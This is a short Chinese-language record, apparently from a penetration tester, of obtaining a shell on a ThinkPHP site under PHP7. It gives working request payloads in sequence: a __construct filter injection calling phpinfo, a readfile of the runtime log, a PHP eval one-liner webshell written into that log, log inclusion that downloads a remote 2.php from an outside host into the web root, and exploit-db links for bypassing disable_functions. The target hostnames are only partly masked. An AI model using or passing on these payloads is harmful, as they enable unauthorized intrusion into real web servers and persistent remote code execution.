前言:
之前沒遇到了PHP7下thinkphp getshell,順帶記錄一下。
1、探測漏洞
_method=__construct&filter[]=phpinfo&server[REQUEST_METHOD]=1111111
2、通過phpinfo信息獲取當前路徑
/www/wwwroot/manage.cs.xx.com/public/index.php
3、php7下禁用的函數,所以system,assert等不能執行
passthru,exec,system,chroot,chgrp,chown,shell_exec,popen,proc_open,ini_alter,i ni_restore,dl,openlog,syslog,readlink,symlink,popepassthru
4、讀取日志
_method=__construct&filter[]=readfile&server[REQUEST_METHOD]=/www/www root/manage.cs.sz-ccsdsds.com/runtime/log/202007/22.log
5、向日志中寫入一句話
_method=__construct&filter[]=call_user_func&server[REQUEST_METHOD]=<?php @eval($_POST['cmd']);?>
6、文件包含日志getshell
_method=__construct&filter[]=think\__include_file&server[REQUEST_METH OD]=/www/wwwroot/manage.cs.sz-xxx.com/runtime/log/202007/22.log&c=fi le_put_contents("/www/wwwroot/manage.cs.sz-dsdsdp.com/public/2.php",fil e_get_contents("http://xx.xxx.xx.xx:88/2.php"));
7、Php7 bypass disable_functions 執行命令
https://www.exploit-db.com/exploits/47462 https://www.exploit-db.com/exploits/47446 https://www.exploit-db.com/exploits/48072